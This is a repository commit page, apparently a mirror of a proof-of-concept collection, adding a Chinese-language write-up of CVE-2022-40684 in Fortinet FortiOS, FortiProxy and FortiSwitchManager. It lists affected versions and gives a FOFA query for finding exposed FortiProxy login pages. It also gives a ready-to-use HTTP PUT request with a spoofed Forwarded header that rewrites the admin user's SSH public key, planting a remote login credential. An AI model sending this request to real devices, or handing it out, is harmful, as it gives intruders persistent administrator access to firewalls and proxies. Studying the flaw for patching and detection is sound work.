admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-05 10:50:23 +00:00
Code Issues Packages Projects Releases Wiki Activity

更新漏洞库:网络设备漏洞/

Browse Source
This commit is contained in:
Threekiii 2022-10-24 10:22:22 +08:00
parent 2034fe3dda
commit b636867294
1 changed files with 42 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

42
网络设备漏洞/Fortinet FortiOS admin 远程命令执行漏洞 CVE-2022-40684.md Normal file
View File

@ -0,0 +1,42 @@
# Fortinet FortiOS admin 远程命令执行漏洞 CVE-2022-40684
## 漏洞描述
Fortinet 周一指出,上周修补的 CVE-2022-40684 身份验证绕过安全漏洞,正在野外被广泛利用。作为管理界面上的一个身份验证绕过漏洞,远程威胁参与者可利用其登录 FortiGate 防火墙、FortiProxy Web 代理、以及 FortiSwitch ManagerFSWM本地管理实例
## 漏洞影响
```
FortiOS <= 7.2.1、7.2.0、7.0.6、7.0.5、7.0.4、7.0.3、7.0.2、7.0.1、7.0.0
FortiProxy <= 7.2.0、7.0.6、7.0.5、7.0.4、7.0.3、7.0.2、7.0.1、7.0.0
FortiSwitchManager <= 7.2.0、7.0.0
```
## FOFA
```
title="FortiProxy"
```
## 漏洞复现
登录页面
![image-20221024102035598](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202210241020634.png)
验证POC, 利用时更换 admin用户名及 ssh-public-key1中的 ssh key 添加远程 SSH登录凭证
```
PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 597
Content-Type: application/json
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
User-Agent: Report Runner
{"ssh-public-key1": "123"}
```
![image-20221024102051085](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202210241020134.png)